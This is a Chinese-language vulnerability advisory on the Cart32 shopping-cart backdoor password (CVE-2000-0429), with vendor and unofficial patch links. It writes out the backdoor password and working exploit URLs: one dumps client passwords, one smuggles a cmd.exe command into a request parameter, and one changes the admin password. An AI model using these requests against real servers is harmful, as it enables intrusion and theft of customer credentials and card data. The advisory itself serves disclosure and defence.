发布日期：2000-04-27
更新日期：2000-04-27

受影响系统：

McMurtrey/Whitaker & Associates Cart32 3.0
McMurtrey/Whitaker & Associates Cart32 2.6

描述：

---

BUGTRAQ  ID: 1153
CVE(CAN) ID: CVE-2000-0429

Cart32是一款适用于Windows操作系统上流行的电子购物系统，由McMurtrey/Whitaker及其合作者们开发。

Cart32被发现存在一个后门口令。任何知道了这个口令的攻击者都可以远程获得客户资料（包括口令，信用卡号等重要信息），并可以执行任意系统命令。

在car32.exe中存在一个后门口令:"wemilo"，任何知道这个口令的攻击者都可以通过执行下列URL：

http://www.victim.com/scripts/cart32.exe/cart32clientlist

来获取客户的口令列表。尽管得到的口令是加密过的，但是通过在某些URL中使用这些口令密文，攻击者可以执行任意系统命令，例如：

http://www.victim.com/scripts/c32web.exe?TabName=Cart32%2B&Action=Save+Cart32%2B+Tab&SaveTab=Cart32%2B&Client=foobar&ClientPassword=e%21U%23_%25%28%5D%5D%26%25*%2B-a&Admin=&AdminPassword=&TabToSave=Cart32%2B&PlusTabToSave=Run+External+Program&UseCMDLine=Yes&CMDLine=cmd.exe+%2Fc+dir+%3E+c%3A%5Cfile.txt

执行这个url会将c:的目录列表保存在file.txt中。

另外，如果攻击者知道了后门口令的话，通过提交URL：

http://charon/scripts/c32web.exe/ChangeAdminPassword

将可以修改管理口令。

<*来源：Cerberus Security Team （CST@CERBERUS-INFOSEC.CO.UK）
  
  链接：http://www.cerberus-infosec.co.uk/advisories.shtml
        http://online.securityfocus.com/advisories/2183
        *>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Cerberus Security Team （CST@CERBERUS-INFOSEC.CO.UK）提供了如下测试方法：

http://target/scripts/cart32.exe/cart32clientlist
http://target/scripts/c32web.exe/ChangeAdminPassword

建议：

---

临时解决方法：

如果您不能立刻安装补丁或者升级，NSFOCUS建议您采取以下措施以降低威胁：

* Lopht Research Labs/@Stake提供了非官方补丁：

L0pht/@Stake Binary:
http://www.l0pht.com/advisories/cartfix.exe
http://www.securityfocus.com/data/vulnerabilities/patches/cartfix.exe

L0pht/@Stake Source Code:
http://www.l0pht.com/advisories/cartfixsrc.zip
http://www.securityfocus.com/data/vulnerabilities/patches/cartfixsrc.zip

厂商补丁：

McMurtrey/Whitaker & Associates
-------------------------------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

McMurtrey/Whitaker & Associates Cart32 2.6:
      McMurtrey/Whitaker & Associates Patch c32admin (2.6)
      http://www.cart32.com/download/v26latestbuilds/c32admin.exe
      Copy into the Cart32 directory. "On ISP" installations do not need
      this file.
      McMurtrey/Whitaker & Associates Patch cart
      http://www.cart32.com/download/v26latestbuilds/cart.exe
      Copy into the Cart32 directory.
      McMurtrey/Whitaker & Associates Patch cart32 (2.6)
      ftp://ftp.cart32.com/v26latestbuilds/cart32.exe
      Copy into the CGI directory.
      McMurtrey/Whitaker & Associates Patch c32web (2.6)
      ftp://ftp.cart32.com/v26latestbuilds/c32web.exe
      Copy into the CGI directory.
McMurtrey/Whitaker & Associates Cart32 3.0:
      McMurtrey/Whitaker & Associates Patch c32admin (3.0)
      ftp://ftp.cart32.com/v30latestbuilds/c32admin.exe
      Download this file only if you are running the "On your own server"
      version. Place this file in the installation directory which is c:
      \program files\mwainc\cart32 by default.
      McMurtrey/Whitaker & Associates Patch cart32 (3.0)
      http://www.cart32.com/download/v30latestbuilds/cart32.exe
      Copy into the CGI directory.
      McMurtrey/Whitaker & Associates Patch c32web (3.0)
      ftp://ftp.cart32.com/v30latestbuilds/c32web.exe
      Copy into the CGI directory.

浏览次数：6452
严重程度：0（网友投票）